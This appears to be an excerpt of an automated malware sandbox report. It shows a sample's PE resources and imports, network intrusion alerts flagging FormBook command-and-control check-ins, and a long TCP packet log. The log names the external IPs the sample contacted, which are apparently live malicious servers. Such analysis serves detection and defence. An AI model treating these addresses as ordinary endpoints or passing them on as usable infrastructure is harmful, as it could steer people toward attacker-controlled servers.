.rsrc | 0x3c7000 | 0xb48 | 0xc00 | 13d9a87cc14830e1f01c641a62386bbe | False | 0.4215494791666667 | data | 4.357284806500026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c71c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894
RT_DIALOG | 0x3c74a8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3c75a8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3c76c8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3c7790 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3c77f0 | 0x14 | data | English | United States | 1.2
RT_MANIFEST | 0x3c7808 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                                              2025-01-11T04:01:58.587138+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049849101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T04:02:01.448165+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049850101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T04:02:04.289281+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049851101.35.209.18380TCP
                                                                                                                                                                              2025-01-11T04:02:09.905500+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049852154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:12.730647+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049853154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:15.561790+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049854154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:18.380678+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049855154.23.178.23180TCP
                                                                                                                                                                              2025-01-11T04:02:32.210110+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049859208.91.197.3980TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                              Jan 11, 2025 03:54:05.857695103 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.857695103 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.857719898 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.858520031 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.858787060 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888171911 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.888334990 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888470888 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888741016 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.888911963 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888911963 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888942957 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888942957 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888942957 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.888942957 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.889542103 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:05.889708996 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.889708996 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:05.889816046 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.159482002 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.159487963 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.159722090 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.159722090 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.160124063 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.160286903 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.160286903 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.160391092 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.160784006 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.160943985 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.160943985 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.160973072 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.160973072 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.161046028 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.161684990 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.161851883 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.161851883 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.161881924 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.161881924 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.162327051 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.162532091 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.162532091 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.162560940 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.163078070 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.163249016 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.163249016 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.163278103 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.163278103 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.163825035 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.164002895 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.164144039 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.164583921 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.164872885 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.165194035 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.165340900 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.165340900 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.165395021 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.165446043 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.165911913 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.166057110 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.166057110 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.166085005 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.166085005 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.166085005 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.166110039 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.166184902 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:06.166270971 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.166270971 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.201582909 CET49757443192.168.11.20122.201.127.17
                                                                                                                                                                              Jan 11, 2025 03:54:06.201610088 CET44349757122.201.127.17192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:45.286252022 CET4975880192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:54:45.424557924 CET804975876.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:45.424925089 CET4975880192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:54:45.427309990 CET4975880192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:54:45.568183899 CET804975876.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:45.568234921 CET804975876.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:54:45.568526983 CET4975880192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:54:45.569189072 CET4975880192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:54:45.706995010 CET804975876.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:00.820580959 CET4975980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:00.993096113 CET8049759209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:00.993424892 CET4975980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:00.996870041 CET4975980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:01.169244051 CET8049759209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:01.176788092 CET8049759209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:01.176827908 CET8049759209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:01.176955938 CET4975980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:02.503644943 CET4975980192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:03.519941092 CET4976080192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:03.698071957 CET8049760209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:03.698290110 CET4976080192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:03.702002048 CET4976080192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:03.874403000 CET8049760209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:03.881547928 CET8049760209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:03.881568909 CET8049760209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:03.881804943 CET4976080192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:04.273840904 CET8049760209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:04.274072886 CET4976080192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:05.206274986 CET4976080192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:06.222390890 CET4976180192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:06.396167994 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.396394014 CET4976180192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:06.400052071 CET4976180192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:06.572640896 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.572684050 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.572947025 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.573138952 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.573405981 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.581365108 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.581412077 CET8049761209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:06.581593990 CET4976180192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:07.908809900 CET4976180192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:08.925488949 CET4976280192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:55:09.098141909 CET8049762209.74.77.109192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:55:09.098416090 CET4976280192.168.11.20209.74.77.109
                                                                                                                                                                              Jan 11, 2025 03:56:10.880064964 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.193212032 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.193407059 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.197020054 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.197084904 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:11.510345936 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510584116 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510613918 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510633945 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510909081 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510946989 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.510968924 CET8049777101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:11.511147022 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:12.707052946 CET4977780192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:13.723488092 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.027865887 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.028179884 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.030600071 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.333422899 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.333808899 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.333863974 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:14.334122896 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.334753990 CET4977880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 03:56:14.638403893 CET8049778101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:19.743594885 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:20.048332930 CET8049779154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:20.048496008 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:20.052020073 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:20.356772900 CET8049779154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:20.357069969 CET8049779154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:20.357203007 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:21.564495087 CET4977980192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:22.580616951 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:22.885245085 CET8049780154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:22.885418892 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:22.888964891 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:23.193686008 CET8049780154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:23.193897009 CET8049780154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:23.194046021 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:24.391966105 CET4978080192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.408330917 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.713776112 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:25.713970900 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.718099117 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:25.718147993 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:26.023358107 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.023509979 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.023819923 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.024060965 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.024257898 CET8049781154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:26.024403095 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:27.219715118 CET4978180192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.235860109 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.540479898 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:28.540646076 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.543059111 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.847678900 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:28.847944975 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:28.848207951 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:28.848885059 CET4978280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 03:56:29.153404951 CET8049782154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:34.035521030 CET4978380192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:34.177002907 CET8049783208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:34.177206993 CET4978380192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:34.180754900 CET4978380192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:34.322137117 CET8049783208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:36.702521086 CET4978480192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:36.844116926 CET8049784208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:36.844363928 CET4978480192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:36.847908974 CET4978480192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:36.989562988 CET8049784208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:39.373825073 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.515198946 CET8049785208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:39.515372038 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.518979073 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.519007921 CET4978580192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:39.660450935 CET8049785208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:42.045115948 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:42.186781883 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:42.187024117 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:42.189434052 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:42.339493036 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045331001 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045351028 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045366049 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045553923 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.045620918 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045666933 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045799017 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.045804024 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.045914888 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.046039104 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.046042919 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.046245098 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.106545925 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.152916908 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.193376064 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193422079 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193455935 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193672895 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.193799019 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.193844080 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.194068909 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.194116116 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.194478035 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.303419113 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.303473949 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.303769112 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.343056917 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343291044 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343346119 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343395948 CET8049786208.91.197.39192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:56:43.343576908 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:56:43.343578100 CET4978680192.168.11.20208.91.197.39
                                                                                                                                                                              Jan 11, 2025 03:58:03.308619976 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.426992893 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.427242994 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.429758072 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.548049927 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.907243967 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.907347918 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.907572985 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.908004999 CET8049798172.67.167.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:03.908195972 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:03.908795118 CET4979880192.168.11.20172.67.167.146
                                                                                                                                                                              Jan 11, 2025 03:58:04.026926041 CET8049798172.67.167.146192.168.11.20
